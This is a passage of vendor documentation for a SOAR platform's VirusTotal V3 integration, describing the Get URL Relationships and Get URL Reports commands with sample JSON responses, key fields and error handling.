Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 400. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Invalid IP. |
Error Sample Data Get IP Reports failed. Status Code: 400. Message: Invalid IP. |
Get URL Relationships
Retrieves objects related to the specified URLs.
Input
Input Parameter | Required/Optional | Description | Example |
URLs | Required | The URLs to retrieve related objects. | ["http://*****.*****.***"] |
Relationship | Required | The relationship between the specified URLs and the related objects to return. Note: Relationship options labeled with “(Enterprise)” (e.g. Analyses (Enterprise)) can only be used with a premium VirusTotal API connection. | Network_location |
Output
The primary response data from the API request.
D3 enriches the raw data from the original VirusTotal API response by adding the url field to indicate your input URLs.
SAMPLE DATA
[
{
"meta": {
"count": 1,
"url": "http://*****.*****.***"
},
"data": [
{
"attributes": {
"graph_data": {
"version": "3.8.2",
"description": "*****.***"
},
"views_count": 12,
"links": [
{
"connection_type": "resolutions",
"source": "*****.***",
"target": "relationships_resolutions_vizcom"
}
],
"last_modified_date": 1577598971,
"private": false,
"creation_date": 1577588554,
"comments_count": 0,
"position": {
"y": 2106,
"x": 953,
"scale": "0.8705505632961243"
},
"nodes": [
{
"index": 0,
"entity_id": "*****.***",
"x": 1050,
"y": -1858,
"text": "*****.***",
"type": "domain"
}
]
},
"type": "graph",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/graphs/*****"
}
}
],
"links": {
"self": "https://www.virustotal.com/api/v3/urls/*****/graphs?limit=10"
}
}
]The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.
Same as Raw Data, D3 enriches the context data from the original VirusTotal API response by adding the url field to indicate your input URLs.
It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.
SAMPLE DATA
[
{
"meta": {
"count": 1,
"url": "http://*****.*****.***"
},
"data": [
{
"attributes": {
"graph_data": {
"version": "3.8.2",
"description": "*****.***"
},
"views_count": 12,
"links": [
{
"connection_type": "resolutions",
"source": "*****.***",
"target": "relationships_resolutions_vizcom"
}
],
"last_modified_date": 1577598971,
"private": false,
"creation_date": 1577588554,
"comments_count": 0,
"position": {
"y": 2106,
"x": 953,
"scale": "0.8705505632961243"
},
"nodes": [
{
"index": 0,
"entity_id": "*****.***",
"x": 1050,
"y": -1858,
"text": "*****.***",
"type": "domain"
}
]
},
"type": "graph",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/graphs/*****"
}
}
],
"links": {
"self": "https://www.virustotal.com/api/v3/urls/*****/graphs?limit=10"
}
}
]Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"Urls": [
"http://*****.*****.***"
]
}Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.
The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulProvides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
No Sample DataError Handling
If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get Url Relationships failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 400. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Invalid URL. |
Error Sample Data Get Url Relationships failed. Status Code: 400. Message: Invalid URL. |
Get URL Reports
Analyzes and retrieves scan reports on URLs.
Input
Input Parameter | Required/Optional | Description | Example |
URLs | Required | The list of URLs to return corresponding report information. |
JSON
|
Output
The primary response data from the API request.
D3 customizes the Raw Data by changing JSON object to JSON array in API returned JSON.
SAMPLE DATA
[
{
"data": {
"attributes": {
"last_modification_date": 1632330799,
"last_http_response_cookies": {
"NID": "511=*****-*****",
"1P_JAR": "2021-09-22-17"
},
"times_submitted": 88586,
"total_votes": {
"harmless": 226,
"malicious": 104
},
"title": "Google",
"last_submission_date": 1632330474,
"last_http_response_content_length": 148497,
"last_http_response_headers": {
"x-xss-protection": "0",
"transfer-encoding": "chunked",
"set-cookie": "1P_JAR=2021-09-22-17; expires=Fri, 22-Oct-2021 17:08:02 GMT; path=/; domain=.google.com; Secure, NID=511=*****-*****; expires=Thu, 24-Mar-2022 17:08:02 GMT; path=/; domain=.google.com; HttpOnly",
"expires": "-1",
"server": "gws",
"cache-control": "private, max-age=0",
"date": "Wed, 22 Sep 2021 17:08:02 GMT",
"p3p": "CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"",
"alt-svc": "h3=\":443\"; ma=2592000,h3-29=\":443\"; ma=2592000,h3-T051=\":443\"; ma=2592000,h3-Q050=\":443\"; ma=2592000,h3-Q046=\":443\"; ma=2592000,h3-Q043=\":443\"; ma=2592000,quic=\":443\"; ma=2592000; v=\"46,43\"",
"content-type": "text/html; charset=UTF-8",
"x-frame-options": "SAMEORIGIN"
},
"reputation": 345,
"threat_names": [],
"tags": [],
"last_analysis_date": 1632330474,
"first_submission_date": 1281524160,
"categories": {
"Forcepoint ThreatSeeker": "search engines and portals",
"Sophos": "search engines",
"BitDefender": "searchengines"
},
"last_http_response_content_sha256": "*****",
"last_http_response_code": 200,
"last_final_url": "https://www.google.com/",
"url": "https://www.google.com/",
"last_analysis_stats": {
"harmless": 80,
"malicious": 1,
"suspicious": 0,
"undetected": 9,
"timeout": 0
},
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "malicious",
"result": "phishing",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"Comodo Valkyrie Verdict": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Cyren": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Cyren"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"BlockList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BlockList"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"0xSI_f33d": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "0xSI_f33d"
},
"Feodo Tracker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Feodo Tracker"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Cyan": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Cyan"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"CRDF": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CRDF"
},
"Rising": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Rising"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Fortinet": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Fortinet"
},
"alphaMountain.ai": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"Artists Against 419": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Artists Against 419"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"SafeToOpen": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"ADMINUSLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ADMINUSLabs"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"AutoShun": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "AutoShun"
},
"Trustwave": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Trustwave"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"CyRadar": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyRadar"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"Emsisoft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Webroot": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Webroot"
},
"Avira": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Avira"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"Antiy-AVL": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"DNS8": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "DNS8"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "benkow.cc"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"Lumu": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Lumu"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"Kaspersky": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"Malware Domain Blocklist": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malware Domain Blocklist"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Netcraft": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Netcraft"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"Sangfor": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sangfor"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Spamhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spamhaus"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"StopBadware": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "StopBadware"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"NotMining": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "NotMining"
},
"Forcepoint ThreatSeeker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Certego": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"Bfore.Ai PreCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
}
},
"html_meta": {
"description": [
"Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for."
],
"robots": [
"noodp"
]
},
"outgoing_links": [
"https://www.blogger.com/*****",
"https://www.youtube.com/*****"
]
},
"type": "url",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/urls/*****"
}
}
}
]The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.
Same as Raw Data, D3 customizes the Context Data by changing JSON object to JSON array in API returned JSON.
It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.
SAMPLE DATA
[
{
"data": {
"attributes": {
"last_modification_date": 1632330799,
"last_http_response_cookies": {
"NID": "511=*****-*****",
"1P_JAR": "2021-09-22-17"
},
"times_submitted": 88586,
"total_votes": {
"harmless": 226,
"malicious": 104
},
"title": "Google",
"last_submission_date": 1632330474,
"last_http_response_content_length": 148497,
"last_http_response_headers": {
"x-xss-protection": "0",
"transfer-encoding": "chunked",
"set-cookie": "1P_JAR=2021-09-22-17; expires=Fri, 22-Oct-2021 17:08:02 GMT; path=/; domain=.google.com; Secure, NID=511=*****-*****; expires=Thu, 24-Mar-2022 17:08:02 GMT; path=/; domain=.google.com; HttpOnly",
"expires": "-1",
"server": "gws",
"cache-control": "private, max-age=0",
"date": "Wed, 22 Sep 2021 17:08:02 GMT",
"p3p": "CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"",
"alt-svc": "h3=\":443\"; ma=2592000,h3-29=\":443\"; ma=2592000,h3-T051=\":443\"; ma=2592000,h3-Q050=\":443\"; ma=2592000,h3-Q046=\":443\"; ma=2592000,h3-Q043=\":443\"; ma=2592000,quic=\":443\"; ma=2592000; v=\"46,43\"",
"content-type": "text/html; charset=UTF-8",
"x-frame-options": "SAMEORIGIN"
},
"reputation": 345,
"threat_names": [],
"tags": [],
"last_analysis_date": 1632330474,
"first_submission_date": 1281524160,
"categories": {
"Forcepoint ThreatSeeker": "search engines and portals",
"Sophos": "search engines",
"BitDefender": "searchengines"
},
"last_http_response_content_sha256": "*****",
"last_http_response_code": 200,
"last_final_url": "https://www.google.com/",
"url": "https://www.google.com/",
"last_analysis_stats": {
"harmless": 80,
"malicious": 1,
"suspicious": 0,
"undetected": 9,
"timeout": 0
},
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "malicious",
"result": "phishing",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"Comodo Valkyrie Verdict": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Cyren": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Cyren"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"BlockList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BlockList"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"0xSI_f33d": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "0xSI_f33d"
},
"Feodo Tracker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Feodo Tracker"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Cyan": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Cyan"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"CRDF": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CRDF"
},
"Rising": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Rising"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Fortinet": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Fortinet"
},
"alphaMountain.ai": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"Artists Against 419": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Artists Against 419"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"SafeToOpen": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"ADMINUSLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ADMINUSLabs"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"AutoShun": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "AutoShun"
},
"Trustwave": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Trustwave"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"CyRadar": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyRadar"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"Emsisoft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Webroot": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Webroot"
},
"Avira": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Avira"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"Antiy-AVL": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"DNS8": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "DNS8"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "benkow.cc"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"Lumu": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Lumu"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"Kaspersky": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"Malware Domain Blocklist": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malware Domain Blocklist"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Netcraft": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Netcraft"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"Sangfor": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sangfor"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Spamhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spamhaus"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"StopBadware": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "StopBadware"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"NotMining": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "NotMining"
},
"Forcepoint ThreatSeeker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Certego": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"Bfore.Ai PreCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
}
},
"html_meta": {
"description": [
"Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for."
],
"robots": [
"noodp"
]
},
"outgoing_links": [
"https://www.blogger.com/*****",
"https://www.youtube.com/*****"
]
},
"type": "url",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/urls/*****"
}
}
}
]Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"Urls": [
"https://www.google.com/"
],
"Titles": [
"Google"
],
"Reputations": [
345
],
"LastAnalysisDateTimestamps": [
1632330474
],
"HarmlessCounts": [
80
],
"MaliciousCounts": [
1
],
"SuspiciousCounts": [
0
],
"UndetectedCounts": [
9
],
"UrlIDs": [
"*****"
]
}Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.
The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulProvides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
DATA |
|---|
